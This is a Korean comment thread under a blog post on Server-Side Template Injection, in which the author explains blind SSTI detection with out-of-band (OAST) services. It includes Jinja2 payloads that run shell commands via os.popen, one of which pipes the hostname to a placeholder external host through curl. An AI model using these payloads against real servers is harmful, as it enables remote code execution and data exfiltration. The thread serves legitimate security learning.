utterances-bot commented 2 years ago

Server-Side Template Injection (SSTI)

🔍 Introduction SSTI(Server-Side Template Injection)은 공격자가 Template 코드를 기존 template에 include 시켜서 원하는 액션을 수행하도록 하는 공격입니다. 이 때 template injection이 발생하는 위치가 server-side인 경우 SSTI라고 부릅니다. SSTI가 발생하는 경우 Server-Side의 렌더링에 관여할 수 있기 때문에 단순하게는 Client-Side의 취약점들(XSS,CSRF 등) 뿐만 아니라 Server-Side의 취약점들(RCE,S

https://www.hahwul.com/cullinan/ssti/

geeneoning commented 2 years ago

안녕하세요! ssti 를 공부하던 중에 궁금한 것이 생겨서 질문 남깁니다! ssti 를 시도하기 위한 포인트를 탐색할 때 입력값이 페이지에 렌더링 되거나 혹은 직접적으로 보여지진 않더라도 burp 같은 도구를 통해 response 에 입력값이 보여진다면 그 부분을 포인트로 공격해 볼 수 있을 것 이라고 생각되는데

이런 입력값이 보여지는 경우가 아니더라도 공격을 시도할 수 있는 포인트가 있을까요?!

hahwul commented 2 years ago

@geeneoning 안녕하세요! 먼저 이야기주신대로 SSTI는 response에 template 구문이 처리되어 노출되면 쉽게 식별할 수 있습니다. 만약 그렇지 않다고 해도 OAST 등으로 Blind SSTI를 식별할 수 있는 방법이 있습니다. 이는 RCE나 Blind SSRF를 식별하는 방법과 유사합니다.

대다수 Blind 취약점은 OAST로 식별합니다 😊

Jinja2로 예를들어 보면 아래와 같이 OAST 서비스를 향하는 페이로드를 프레임워크 별로 리스트를 만들고, 이를 Fuzz 하면서 OAST 서비스로 도착하는 Interaction(DNS Query, HTTP Request 등)을 보고 실제로 페이로드가 동착했는지 추측할 수 있습니다.

{{config.__class__.__init__.__globals__['os'].popen('curl <OAST-SERVICE>').read()}}

만약 위 페이로드로 HTTP Request 까지 도착했다면, 아래와 같이 RCE를 증명할 수 있겠네요 :D

{{config.__class__.__init__.__globals__['os'].popen('hostname | xargs -I % curl <OAST-SERVICE>/%``').read()}}

GET /testpc.local

hahwul commented 2 years ago

@geeneoning 꼭 RCE 형태가 아니더라도 아래와 같이 img 태그 등과 조합해서 백엔드단에서 Template 문법을 처리하는지 체크하는 방법도 있겠네요 :D

<img src="//{{17 * 32}}.OASTSERVICE.com">

Template 처리 시 544.OASTSERVICE.com 도메인으로 Interaction 발생

e.g

[544.ca71k25vqc7kr2hpkfjgck8bwneyyyyyn] Received DNS interaction (A) from ********
[544.ca71k25vqc7kr2hpkfjgck8bwneyyyyyn] Received HTTP interaction from ********

geeneoning commented 2 years ago

너무 신기하네요! 감사합니다 :)

hahwul / assets.hahwul.com

cullinan/ssti/ #111

Server-Side Template Injection (SSTI)